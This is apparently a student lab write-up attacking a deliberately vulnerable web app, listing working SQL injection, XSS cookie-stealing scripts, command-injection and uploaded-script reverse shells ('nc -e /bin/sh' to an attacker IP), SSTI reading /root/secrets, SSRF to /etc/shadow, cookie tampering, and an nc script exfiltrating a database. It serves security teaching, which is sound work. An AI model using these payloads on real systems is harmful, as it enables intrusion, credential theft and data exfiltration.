STL 1 Assignment 7

![](https://hackmd.io/_uploads/rkDAhVeth.png) Victim IP : 10.0.2.18 ![](https://hackmd.io/_uploads/SJsnp4et2.png) Queries button Possible Attack Vector: ![](https://hackmd.io/_uploads/HJXW04lFh.png) Login page ![](https://hackmd.io/_uploads/ByIG0NgF2.png) # 1 Method 1 (Shown in class) : ![](https://hackmd.io/_uploads/r1Ey-SgFh.png) ![](https://hackmd.io/_uploads/SJIzxfSYn.png) `'OR 1=1 --` No knowledge of the accounts are necessary because it closes statement and with `1=1` returning always true, the login will always be successful. Method 2: `'UNION SELECT 'alice', 'password', 'alice@alice.com' --` ![](https://hackmd.io/_uploads/HyImzzrt2.png) ![](https://hackmd.io/_uploads/HyNVGMrYn.png) Note that we would need to have some knowledge of what the usernames can be. Method 3: ![](https://hackmd.io/_uploads/BkaTAZBt2.png) ![](https://hackmd.io/_uploads/ryMMxGHtn.png) `' OR 9090--` Closes the previous statement and comments out the next statement. Having an INT is automatically considered as true and allows for login. Note: Clean up the input string in order to create a more secure environment. # 2 Using Burpsuite, we can bruteforce possible attack to find the password for the `Admin` user with the given `credentials.txt` ![](https://hackmd.io/_uploads/r1gDGreK2.png) ![](https://hackmd.io/_uploads/BJZcmGrY2.png) ![](https://hackmd.io/_uploads/SJowmfrtn.png) ![](https://hackmd.io/_uploads/SkuCcreKh.png) using the found username and password, we can login as admin to do the exploit. ## Blind SQL Injection In the url `http://10.0.2.18/posts/1 order by XX` Tried with 10 and this is the result ![](https://hackmd.io/_uploads/Skt058St2.png) We know that it's only from 1-6: Now we can try to see the available table names that are not sqllite (default db) `http://10.0.2.18/posts/1 Union SELECT 1,2,3,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` ![](https://hackmd.io/_uploads/rkW9hUBth.png) when we change the order `http://10.0.2.18/posts/1 Union SELECT 3,2,1,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`. This is what we get: ![](https://hackmd.io/_uploads/SksVp8HY3.png) We did this because we want to know which column is containing what. To see the table details: `http://10.0.2.18/posts/1 Union SELECT 1,sql,3,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` ![](https://hackmd.io/_uploads/B1I6lPrKn.png) ![](https://hackmd.io/_uploads/B1yrbPrF3.png) To find the username and password information: `http://10.0.2.18/posts/1 Union SELECT 1,username,password,4,5,6 from users` ![](https://hackmd.io/_uploads/S1VXMvBFh.png) we can see that the information is displayed on the website. ## Persistent XSS Attack At this point, the bug bounty machine was restarted: ![](https://hackmd.io/_uploads/SygdBjrth.png) `<script>var i=new Image;i.src="http://10.0.2.18/news?text="+document.cookie;</script>` ![](https://hackmd.io/_uploads/HJcVUiHYn.png) Whenever Admin posts things the cookie is posted in the news list. ``` Admin says: pin=2010; session=.eJyrVopPy0kszkgtVrKKrlZSKAFSSrmpxcWJ6alKOkoemZeQrBpcnJQCFFpdjaWB2l0uLUIiUrmFrHlNzMPKBKCB1bWwsAWugakw.F4m3cA.PpBrKM4xJq4TwmsVQmQxiqPkKsM ``` ## Reflected XSS Attack `http://10.0.2.18/search?u=<script>window.location=" http://10.0.2.18/news?text= " + document.cookie</script>` ![](https://hackmd.io/_uploads/H1ueojSYn.png) The command will redirect traffic to the website’s news tab posting the cookie there. ![](https://hackmd.io/_uploads/SkpY0sBY3.png) ![](https://hackmd.io/_uploads/BJhOioSt2.png) ![](https://hackmd.io/_uploads/rkQMRiBY2.png) ![](https://hackmd.io/_uploads/SyzJgnrF3.png) It is possible to defend against XSS attacks, which can be done if the following are followed: • Input Validation should be carried on all inputs to remove malicious commands • Filtering of keywords from input. For example, <script></script> or ' 1=1 --, etc. If you ar eusing python sqlalchemy would be a good place to start for this. • Encoding of user inputs so that it is treated as data not codes. ## Remote Code Injection ![](https://hackmd.io/_uploads/Bk28V3SF3.png) `| nc -e /bin/sh 10.0.2.18 8080` --> which is run in the search bar `http://10.0.2.18/website?u=|%20nc%20-e%20/bin/sh%2010.0.2.15%208080` ![](https://hackmd.io/_uploads/S1fBH2HFh.png) `ls` --> which is run on the search bar : `http://10.0.2.18/website?u=|ls` ![](https://hackmd.io/_uploads/Sydj8hrY2.png) ![](https://hackmd.io/_uploads/rkD7L2SY3.png) `cat secrets` --> which is run on the search bar `http://10.0.2.18/website?u=|cat secrets` The command | nc -e /bin/sh 10.0.2.18 8080 was injected into the URL after opening a listener to wait for incoming connections (victims). Once it is connected to a victim, it will redirect all input/output connections of the victim thus allowing attacker to gain remote access. ## Insecure Design Session Cookie : `eyJ1c2VyIjp7IiB0IjpbIkFkbWluIiwiQWRtaW4iXX19.F4m76A.4Bk-VJsqi2J6rumWb9tsu8uAKuw` ![](https://hackmd.io/_uploads/B1LLyaSK2.png) ![](https://hackmd.io/_uploads/ByCPBprFh.png) ![](https://hackmd.io/_uploads/HkxcS6Ht2.png) In the middle of the packet sending, the ID and session cookie is modified. ![](https://hackmd.io/_uploads/Syr1I6BK2.png) ![](https://hackmd.io/_uploads/SkgEL6Htn.png) Allows for the Alice user to Edit as Admin: ![](https://hackmd.io/_uploads/ByNtPaHK3.png) ![](https://hackmd.io/_uploads/B19CParFh.png) This allow Alice to log in as Admin and edit the welcome page. By establishing continuous unit and integration tests will prevent insecure design vulnerabilities. ![](https://hackmd.io/_uploads/HkvfY6BK2.png) ## Vulnerability Scanning (Nikto) `nikto -h http://10.0.2.18` ![](https://hackmd.io/_uploads/Sy0xD1PYh.png) This tool is useful in identifying multiple vulnerabilities such as - XSS - X-Content-Type-Options - No CGI directories found ## Bounty Points ![](https://hackmd.io/_uploads/r1BSi9vFh.png) ### SSTI (Server Side Template Injection) A03:2021-Injection A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. We can use it to open and see contents of the machine. To display the folders in root: `{{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("ls").read()}}` ![](https://hackmd.io/_uploads/SJLIkxPY2.png) ![](https://hackmd.io/_uploads/SJED1lvKn.png) To open the file: `{{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("cat /root/secrets").read()}}` ![](https://hackmd.io/_uploads/H1Y6JlPY3.png) ![](https://hackmd.io/_uploads/H1KA1lwY2.png) This bug can show the server side secret and a good input sanitation can prevent this attack. ### Server-side request forgery (SSRF) A10:2021-Server-Side Request Forgery We can do this by using the Burpsuite Repeater: ![](https://hackmd.io/_uploads/ryUGXevKh.png) ![](https://hackmd.io/_uploads/SkI37eDK3.png) We can change the request from `http://10.0.2.18/static/js/bootstrap.js` to `file:////etc/shadow` in order to forge a request to see the `shadow` file in the machine ![](https://hackmd.io/_uploads/HkPCQlvF2.png) Testing immediately with the browser ![](https://hackmd.io/_uploads/Syq9NlPK3.png) By adding `file:///etc/shadow` at the end of the URL will allow attacker to access files that are on the local system or within the internal network. Disabling unused URL schemas, attacker will not be able to use such web application to make requests. This bug can show the server machine secret and a good sanitisation can prevent this. ### Reverse shell using shell script Content of the shell script ``` nc -e /bin/sh 10.0.2.15 1234 ``` `10.0.2.18/upload` is the way to upload items to `/images` Files can be uploaded to `/static/uploads/` ![](https://hackmd.io/_uploads/BJJtbMvYn.png) ![](https://hackmd.io/_uploads/HyM0bzPFn.png) ![](https://hackmd.io/_uploads/ryDxzMvY2.png) Once uploaded we can run the shell script in `/website` ![](https://hackmd.io/_uploads/HySnMGvF3.png) ![](https://hackmd.io/_uploads/SJ4gXGPtn.png) Reverse shell using uploaded file successful. ### Security Misconfiguration Goal is to get access to hash of passwords. First step is to register a new user: `Owen` with password: `1234` and PIN `1111` ![](https://hackmd.io/_uploads/rJu4oZdF2.png) ![](https://hackmd.io/_uploads/rJrYcbuYh.png) Once done we try to login as Owen and the hash of the password is revealed to the user: ![](https://hackmd.io/_uploads/SkGD3b_Yh.png) ![](https://hackmd.io/_uploads/SJI2nWdY3.png) ![](https://hackmd.io/_uploads/SJWXKbuF3.png) Note that we need to make sure that the cookie and the PIN is different from what we have registered for the user `Owen`, which is a misconfiguration in the setup. ### Broken Access Control Extending from the reverse shell vulnerability, we can send `mssd.db` to the attacker machine in order to gain access to the db files and see the hashed password. ![](https://hackmd.io/_uploads/H1nVMv_Y3.png) Since we know that the file is stored in `/root/mssd.db`, we created a new bash script to upload and run so that the db file can be sent to the attacker machine. Content of `send_file.sh` ``` #!/bin/bash nc -w 3 10.0.2.15 1234 < /root/mssd.db ``` ![](https://hackmd.io/_uploads/H1sLrP_F3.png) ![](https://hackmd.io/_uploads/SJ6KBvdFh.png) To accept `mssd.db` the following is the command to be run: `nc -l -p 1234 > mssd.db` ![](https://hackmd.io/_uploads/BkSxUDdth.png) We can then run `send_file.sh` from `/website` like `reverse_shell.sh`. which can also be done by using the burp suite repeater: ![](https://hackmd.io/_uploads/SJaHYwuth.png) ![](https://hackmd.io/_uploads/Skz8LvuK2.png) The content of the file is shown here: ![](https://hackmd.io/_uploads/SyCt8vOY3.png) ![](https://hackmd.io/_uploads/BJ3qLw_K2.png) ![](https://hackmd.io/_uploads/rk3iLw_Yn.png) Using this vulnerability (of basically allowing nc to send over data) we can see the private contents of the users and other sensitive data.